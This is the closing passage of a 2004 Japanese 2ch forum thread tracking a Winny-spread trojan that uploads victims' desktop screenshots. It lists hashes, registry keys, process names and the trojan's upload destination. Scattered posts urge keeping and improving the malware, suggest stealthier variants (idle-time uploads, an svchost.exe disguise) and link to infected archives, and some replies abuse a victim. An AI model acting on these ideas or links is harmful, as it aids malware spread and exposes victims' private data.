887 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:44:59 ID:LvJ+JBBu]: >>864
亜種ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

つーか、当然そうなる罠
888 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:48:49 ID:RzyOzwfF]: 亜種保管しておこうぜ
いろいろ使えそう
889 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:51:55 ID:mgVunU57]: 亜種はいずれ対応されてしまう。
それよりオリジナルを確保しておいて自分で適宜改良して使うが吉。

で、だれか新型に感染してみたか？
節穴機能は追加されたんだろうか……
890 名前：：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:52:34 ID:pNUKkC8s]: ウィルスバスターかけていたらwindowsやシステム32のほとんどが
dllやexeなんですがこれっておかしいのでしょうか？
891 名前：[名無し]さん(bin+cue).rar [04/09/23 19:53:31 ID:h0nUPIzO]: てかなんでお前らウィルス肯定してんだ

対策しないと２ｃｈが訴えられてまた閉鎖騒ぎになるってのに
892 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:54:58 ID:wZ9Gu9IX]: 本当に
893 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:55:07 ID:bL7m252I]: ほむ、2chが閉鎖となると大変なことになってしまいますね・・・
なんとか対策をたてましょう
894 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:55:09 ID:VuLxnNRm]: >>890
パソコン雑誌買いなさい！必ず買いなさい！
895 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:55:33 ID:l0b9RDPZ]: キーロガーとか、kakikomi.txtうp機能とか
どんどん機能拡張していって欲しい
896 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 19:56:14 ID:r7vcxVQ0]: きんたま感染したぽ・・
>>855はＤＬできないしレジストリで消しても復活するし・・
897 名前：[名無し]さん(bin+cue).rar [04/09/23 19:59:02 ID:h0nUPIzO]: 別スレにも書いたんだけど
96 ：名無したん(;´Д｀)ﾊｧﾊｧ：04/09/23 19:56:41 ID:11SxMVKb
>>91
・２ｃｈうｐろだにうｐされてるあたり２ｃｈ閲覧者の犯行
・２ｃｈねらーが個人情報画像わざわざ晒しあげしてやがる
・これまですべての板内のトラブルはひろゆきへ損害賠償
・今回の場合被害者の数が今までと比較にならない
898 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:00:12 ID:CHjM5zzS]: >>896
いちごきんたまなら>>604
899 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:01:29 ID:r7vcxVQ0]: セーフモードってなんですか？・・
お願いします。
900 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:02:18 ID:0IaPSUs5]: >>899
検索もできませんか
901 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:02:42 ID:JKMNRGue]: >>899
いいから、寝ろ。
902 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:02:59 ID:xdINSUdZ]: >>899
おまえはググる事も出来ないのか?
903 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:04:17 ID:C3nZ381I]: >>899
死ね
904 名前：[名無し]さん(bin+cue).rar [04/09/23 20:04:24 ID:h0nUPIzO]: 3人で叩きｹｺｰﾝとは悲惨な
905 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:04:27 ID:FmEEJd2e]: 質問してるヤシは感染者か？
906 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:05:45 ID:U1wYwujU]: 記念としてとっておきたい、元ファイルくれませんか?
907 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:05:51 ID:OB9dwy0R]: >>899
くだらない事言ってないで早く働けよ
908 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:06:48 ID:r7vcxVQ0]: 感染者です。
ttp://higaitaisaku.web.infoseek.co.jp/safemode.html
msconfigと検索しても出てきません・・
重いからなのでしょうか？
909 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:07:24 ID:l0b9RDPZ]: なんとなくだがキンタマウイルス作成者も
2chをフシアナトラップで荒らした香具師も同一人物のような気がするぞ
910 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:12:28 ID:mgVunU57]: 2ch閉鎖騒動が起こるならそれもまたよし。
次はどこへいくか、誰がやるか、という問題提起になるからな。

……ならないか。
911 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:13:07 ID:PDZ9NpvK]: 今回の件で２ｃｈやひろゆきになんか責任発生するか？
912 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:13:23 ID:yaHp/7Av]: この間発覚した多くの○○○の脆弱性と組み合わされたら、恐ろしいことになる悪寒。
○○○→須磨祖。マジで悪用されたらまずいだろうから。（見当は付くよな）
913 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:13:51 ID:C3nZ381I]: >>908
基本中の基本すら学習しない状態でnyなんかに手を出した事を悔やむこったな。
自業自得だっての。
914 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:15:51 ID:Eei9QNEZ]: >>911
しないよ
915 名前：837 mailto:sage [04/09/23 20:21:06 ID:mmGHQUsE]: 亀レスだけどさぁ。別に俺は感染してないから。
ただヤフー検索でexe　ファイル　捨てたいって
検索してるｓｓがうｐされてて面白かったから書き込んだだけ。
916 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:22:32 ID:qaAkrrtW]: >>915
わーってるよ
917 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:22:56 ID:KYU7HFHZ]: このスレ見てるね
v.isp.2ch.net/up/c50185416f55.jpg
918 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:24:02 ID:mgVunU57]: 今後次第だろ。
今ぐらいの規模ならともかく、大流行とかﾔﾊﾞｲものが晒されたりとかしたらどうなるかわからん。
例えば某○○○○犯罪対策室から感染者が出ちゃうとかな。

無理を通せば道理が引っ込むのはｵﾏｲﾗも知ってのとおり。
919 名前：[名無し]さん(bin+cue).rar [04/09/23 20:24:55 ID:h0nUPIzO]: 個人メルアドとかヤフオクＩＤとパスとか流出してるのはどうなのよ
920 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:24:56 ID:3F3YfAd9]: >>908
それだけではどういう状況かサッパリ他人には伝わらないだろう
自分がどういう環境を持っていて、どういうものに感染して
今まで何をやってどこで躓いているのかくらいは書かないと

重いからというより、アホだから？
921 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:25:35 ID:mmGHQUsE]: >>916
ならいいけどね
922 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:25:41 ID:mgVunU57]: >>918は閉鎖の件ですた。

俺はダメだったけど、一応早めにスレ立てしといた方が良いんじゃない？
というわけで↓よろ。
923 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:26:45 ID:r7vcxVQ0]: さっきのものです。
セーフモードで２つのファイルを消去しました。
下の2つの意味がわからなかったのですが・・・
924 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:27:25 ID:wZ9Gu9IX]: ↑
次はｽﾚたてね
925 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:33:34 ID:C3nZ381I]: >>920
基礎知識が無さ過ぎて説明出来ないだけだろ。
こんなアホにいちいち説明してたらスレ一つ使い切っても足りんよ。
926 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:44:19 ID:g0/m5KiY]: 亜種が出ているスレ。
スレストまでされてます。

今週のジャンプがうｐされているんだが…
news13.2ch.net/test/read.cgi/news/1095933187/
927 名前：627 mailto:sage [04/09/23 20:48:35 ID:Q+leSqll]: >>876
とりあえずノートン先生には提出完了
928 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:48:35 ID:Ze0M08FR]: config.txt ....exeの分を更新したと思ったらまた亜種か・・・orz
929 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:51:03 ID:LvJ+JBBu]: >>926
他のスレでも調子に乗ったバカが亜種をうｐしてるのを見たぞ
バカだなぁこいつら、捕まるともしらんでｗ
930 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:54:00 ID:RzyOzwfF]: キンタマ亜種

今週のジャンプがうｐされているんだが…
news13.2ch.net/test/read.cgi/news/1095933187/
931 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:55:00 ID:adI/sxzM]: もう収拾つかんね。京○府○の仕事が山盛りだな。
932 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:55:50 ID:wZ9Gu9IX]: 頑張ってくれよK察
933 名前：[名無し]さん(bin+cue).rar [04/09/23 20:56:15 ID:h0nUPIzO]: 亜種ってどれくらいいるんだろう
934 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:56:19 ID:Ze0M08FR]: ファイルサイズもファイル名もオリジナルと同じだなあ。ほんとに亜種か？
友達にノートン先生がいるひと、よろしく。
935 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:56:46 ID:CeMeBwCa]: >>934
CRC比較きぼん
936 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 20:57:36 ID:ONxIjWCf]: >>926
これは最初のﾔﾂでしょ
中身はロリ写真集だし、ノートンパッチで反応あり削除されました
937 名前：[名無し]さん(bin+cue).rar [04/09/23 20:59:30 ID:h0nUPIzO]: 次スレ、↓の人よろ
938 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:00:23 ID:kBaEXo4M]: 次スレ建てました。
苺きんたまは流行種１にまとめサイトurl貼りだけ。
必要なら流行種ﾊﾟﾀｰﾝ作ってください。
あと使い終わってから移動よろ。

【警報】Winnyを狙ったワーム・ウイルス情報 Part27
tmp4.2ch.net/test/read.cgi/download/1095939735/
939 名前：[名無し]さん(bin+cue).rar [04/09/23 21:01:49 ID:h0nUPIzO]: >>938
乙

類似品を大量に作れるのならうｐロだ自体を削除しないととまらないかもしれんね
940 名前：627 mailto:sage [04/09/23 21:03:22 ID:Q+leSqll]: >>934

>>930
1のやつはTrojan.Upchan。
CRCも同じ。
941 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:04:41 ID:Ze0M08FR]: >940
あい。了解。
942 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:05:49 ID:h0nUPIzO]: >>929
２ｃｈ史上最多の逮捕者数になるかも試練ね
943 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:06:57 ID:adI/sxzM]: もー京○府○は何やってんだよ！　こういう時こそ役に立てや！
Ｋ札権力であぷろだ止めろよ！
自動ポルノや違法コピーだらけで逮捕せにゃならん奴がまだまだ増えるぞ！
944 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:07:23 ID:dlC1dSfw]: サイズも更新日時をそのまま。苺のやつうｐっただけ
945 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:10:16 ID:OB9dwy0R]: 実はこのウィルスは京○府警の罠
946 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:12:03 ID:cDvdfQLH]: 教徒不敬のｼﾞｻｸｼﾞｴｰﾝ
947 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:12:32 ID:WWPl3lDC]: っていうか、PC名とユーザー名が違うのに晒された画像が同じのがあるんだけど、何で？
もしかして予め画像は用意されてるとか？
948 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:13:11 ID:aNtJ/kjz]: 消防士が放火するって事件が時々あるよね。
949 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:13:51 ID:62NRg8JO]: >>938　お疲れちゃん　

>>947 ダブリもでるらしいよ　知らん人と
950 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:16:45 ID:WWPl3lDC]: >>938
おつかれ

>>949
じゃあ晒された画像はそのどっちかのデスクトップだけってこと？

しかしまぁ苺キンタマのページまとめあげた人は仕事早いなぁ・・
951 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:20:34 ID:62NRg8JO]: >>950 流れが速すぎて状況確認できんのよ　すまんこ
　　　　時間差みたいなことをいってる人がいたみたいだが…
952 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:21:52 ID:b+is4Zm9]: これで京都父兄がまったく動かなかったら父兄が第一容疑者
953 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:25:46 ID:WWPl3lDC]: >>951
いやいや、わざわざスマン。ありがとう。

悪趣味とは思うがヲチ面白いなぁｗ
慌ててウィルススキャンしてるの見てると面白すぎるｗ
954 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:28:10 ID:sOLz9K12]: >>950
自分がアップしたファイル名がわからないので、完了後に一番上にある画像のリンクが使われるらしく、
複数同時にアップされたような場合、同じファイルを指してしまうことがあるらしい。
ファイル自体は、アプロダに個々に存在してるので、リンクだけが同じになってしまっている。
955 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:30:17 ID:xduUn+v/]: 新種というか>>867の詳細

原種/亜種ともに
　Software\Borland\Locales
　Software\Borland\Delphi\Locales
　Software\Meropa
が存在。DelphiとMeropa使いの犯行

　Software\Microsoft\Microsotf
このオチャメな行はなんだろう↑？

Maropa2chなる文字列もあるが、ユーザーエージェントか？これを弾けばBBS投下はとまるかも

今度はBBS投下文字列を少しいじって
【コンピュータ名】【ユーザー名】【今こんな事やってます】になってる
メール欄には「私は升ツールを使用しようとして　罠にかかりました」と表示

ターゲット板が、ネットゲーム、ネトゲサロン、ち～と、雑談系２、厨房！に変更

感染プロセス名は sugoimonoss.com

SS投下先は ttp://up.isp.2ch.net/upload/c=03okari/index.cgi で同じ
わざわざ、閲覧しやすいように ttp://v.isp.2ch.net/ に変えて投下SSを案内

コンパイル時の差異によるバイナリ差があるので、オリジナルに第三者が手を加えた
ものではなく、オリジナル開発者による、パラメータ変更の第二段と考えるべきだろう。

以上、おわり
956 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:30:37 ID:adI/sxzM]: 壁紙やアイコンが見えない状態のSSは成りすましが可能なので注意だな
957 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:31:26 ID:y1QaqjMm]: 俺は実行したくないけどFW超える物なのか?
EXE単位で許可するFWなんだがこいつをスルーするのか?
958 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:33:27 ID:cDvdfQLH]: >>957
スルーする訳ない、安心汁
959 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:35:20 ID:fWYTZuQ9]: >>957
ホワイトリストで許可を出してるFWなら大丈夫だろう。
何を使って、どんな設定にしてるのかわからんけど。
960 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:35:37 ID:62NRg8JO]: >>954　ありがとうさん

>>955 解析おつかれさん
961 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:36:55 ID:xduUn+v/]: f/wに関しては、ポート指定物は無力
アプリレベルで止めるものでも、そのうち、ありがちなアプリ名に偽装
した亜種が出てきたら、見分けつかない。プロセス名は簡単に変えれるっぽい。
962 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:44:00 ID:adI/sxzM]: あとProxomitronとか狙い撃ちされたらFW効かなくない？
963 名前：[名無し]さん(bin+cue).rar [04/09/23 21:46:54 ID:o03myoTB]: 今んとこ２種類だけか？

・苺キンタマ（オリジナル）
〔ファイルサイズ〕677,376 Bytes
〔CRC16〕56B9
〔CRC32〕FC57D234
〔MD5〕 b7921479f8a9079c59c20ef5964338e4

・苺キンタマ（亜種）
〔ファイルサイズ〕677,376 Bytes
〔CRC16〕775A
〔CRC32〕022A1F64
〔MD5〕 5f323255060be4ddf715fa8fa88f883a
964 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:47:24 ID:rREsfmrT]: >>864の～ol25.zipをダウンロードして解凍してみたらconfig.txtだけ解凍に失敗した
なんでだろう
965 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:47:36 ID:cDvdfQLH]: その内作者がShareにウィルスのソース流しそうな予感
966 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:48:53 ID:h0nUPIzO]: >>965
ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
967 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:51:06 ID:h0nUPIzO]: つか、これって知り合いが感染しても自分のデータが流出する可能性があるんだよな？
968 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:51:47 ID:3I9wKrJu]: >>964
readmeに書かれているが関係してるのかな？

解凍するだけでエクスプローラが落ちた＿|￣|○
969 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:51:50 ID:xduUn+v/]: >>963
>>864の config.txt（今のとこ苺キンタマ亜種）で、
漏れのとこに保護してあるのは
〔ファイルサイズ〕699,392 Bytes
〔CRC32〕2A8BEBAA
なんだが……？
970 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:52:08 ID:OVqRCEPB]: >>967
嫌がらせでやる奴いるかもな・・
971 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:56:22 ID:r3qqNy/W]: これってファイルをダブルクリックしなければ大丈夫なんでしょうか？
972 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:57:24 ID:h0nUPIzO]: >>971
亜種も出てきてるしその考え方はよくない
973 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:57:29 ID:cDvdfQLH]: うん
974 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:30 ID:h0nUPIzO]: 亜種情報
インターネット上で確認されたファイル名は[1095925509796_AreTool25.zip]、解凍後にラグナロクオンライン関係のツールを装っています。
実行ファイルは[config.txt]でファイルサイズは683KB。.txtの後ろに大量の空白があり、MS-DOSファイル名はCONFIG~1.EXEとなっています。
Windows95で実行してみましたが、ファイルの作成、レジストリの追加に関しては[shellsystem.exe]を[sugoimonoss.com]に変えただけのものと思われます。
975 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:49 ID:cDvdfQLH]: Delphi程度の言語でしかウィルスを書けない作者が、Windowsのセキュリティホールを利用した
ウィルスを開発するなんてまず無理なんで、とりあえずクリッコしなけりゃだいじょーぶさー
976 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:49 ID:y1QaqjMm]: 俺ならIEを起動してうｐろだに書き込むようなプログラムにする
2chに無理に書く必要は無い
IEに許可与えてない奴は居ないだろうしな
ウイルス感染がばれ易くなるから、マウス、キーボード操作がある一定時間無い時をAFKだと認識してUP
SSは定期的に溜め込んで置く
977 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 21:58:53 ID:r3qqNy/W]: >>971
そうですね・・・。うかつにアップローダのファイルも開けない状態になってしまった・・・。
978 名前：963 [04/09/23 22:00:13 ID:o03myoTB]: >>969
漏れが書いてる亜種は>>864のアプロダと同じとこにうｐしてあった
ttp://picopico.dip.jp/ragnarok/data/1/1095920291421_wana.zip
これ↑のなかの「AretoolTest25～.exe」ってやつ
バイナリのなか見たら亜種クサかったんで

ちなみにこいつ↓を落としたんだが、964氏と同じでconfigが解凍できなかった
ttp://picopico.dip.jp/ragnarok/data/1/1095925509796_AreTool25.zip
979 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:00:24 ID:cDvdfQLH]: svchost.exeとかにするな俺なら
980 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:00:35 ID:wowdpe/L]: >>964
漏れも。解凍はしてないけど、解凍ソフトのメニューで右クリックをしようとしたらメニューが表示できないとか言われてびびった。
一応感染してないかどうか調べようとして、ファイル検索では見つからなかったがレジストリエディタでsugoimonoss.comがヒット(；´Д｀)
びっくりしてよく見て見たらWindowsの検索履歴だった罠・・・驚かせるなよ＿|￣|○
981 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:05:12 ID:Q+leSqll]: >>969
・苺キンタマ（オリジナル）
〔ファイルサイズ〕677,376 Bytes
〔CRC32〕FC57D234
〔MD5〕B7921479F8A9079C59C20EF5964338E4
〔SHA1〕722BB2E6D12167F005E1935B2D3E01229DD30CC5

・苺キンタマ（亜種）
〔ファイルサイズ〕699,392 Bytes
〔CRC32〕2A8BEBAA
〔MD5〕3EC55FBC1036ECF95F5EC15DFBD94DD1
〔SHA1〕3FA0EC2C7062367E7C0ABD0FE43884504906FD11

こんなのか。
982 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:08:13 ID:7p6CJmmF]: >>969
漏れはWinRARで解凍したら「パスとファイル名の長さの合計は 260 文字を超えることはできません」と出たから、Cドライブﾞ直下で解凍したら、解凍できたが、これと一緒ではないか？
983 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:08:55 ID:h0nUPIzO]: tp://idol.bbspink.com/test/read.cgi/ascii2d/1095933366/380
このウィルスらしきものは既出？

恐ろしくて直リンできやしない
984 名前：982 mailto:sage [04/09/23 22:09:10 ID:7p6CJmmF]: 誤爆ｽﾏｿ。>>969ではなく>>978
985 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:09:33 ID:xduUn+v/]: 作成日付も入れとこう
オリジナル 04/09/22 15:57
亜種 04/09/23 14:52

昨夜の騒ぎを楽しんだ後、変えてやがる
986 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:10:05 ID:h0nUPIzO]: 愉快犯かよ
987 名前：[名無し]さん(bin+cue).rar [04/09/23 22:10:10 ID:qRMK2VgF]: だれか、もう一回ノートン先生用の定義パッチアップしてよぉ～。

タスクマネージャーで見るとshellsystem.exeが二匹も
いるんだよぉ～。くぞぉ～
988 名前：964 mailto:sage [04/09/23 22:10:44 ID:rREsfmrT]: 同じ奴が多いな
>>982のやり方で無事に解凍できたぞ
989 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:11:24 ID:mgVunU57]: >>987
(・∀・)ｺﾝﾆﾁﾊ!!
990 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:11:29 ID:1QD87Wms]: 馬鹿ばっかだなこのスレ
991 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:11:41 ID:fWYTZuQ9]: つまり関連スレを巡回してるってことか。
いくつかアイディア出してたやつがいるけど、それが取り込まれた亜種
が流れてくる日も近いなこりゃ。(´･ω･`)
992 名前：964 mailto:sage [04/09/23 22:12:48 ID:rREsfmrT]: >>988
できたぞってなんか命令みたいだな＿|￣|○
訂正する

同じ奴が多いな
>>982のやり方の通りにやったら無事に解凍できた
configだけ解凍できない奴は>>982の通りで出来ると思う
993 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:13:00 ID:h0nUPIzO]: 誰かが言っててたな製作者がwinnyとかにウィルスソースを流したらどうなるだろうって
994 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:14:03 ID:Gd3swaZK]: 最初のウィルス以前にうｐされたファイルはとりあえず安心か？
995 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:14:05 ID:AH6SroMo]: >>993
nyやってるだけの奴にマシな技術の持ち主などいない
996 名前：963 [04/09/23 22:14:37 ID:o03myoTB]: >>982
解凍できたよ
トンクス
997 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:14:56 ID:xduUn+v/]: これのオリジナルは、トロイ開発キットの様相を呈していたから
亜種は簡単に作れるんだろーな。まだ発現させてない機能もある
ようだし。

で、1000取りよろ
998 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:15:01 ID:cDvdfQLH]: ソース流されたらちょっとパス変えるだけで定義ファイルを回避する事も可能
999 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:15:47 ID:A3XC4jaX]: 1000!
1000 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 22:16:06 ID:JKMNRGue]: 1000
1001 名前：１００１ [Over 1000 Thread]: このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef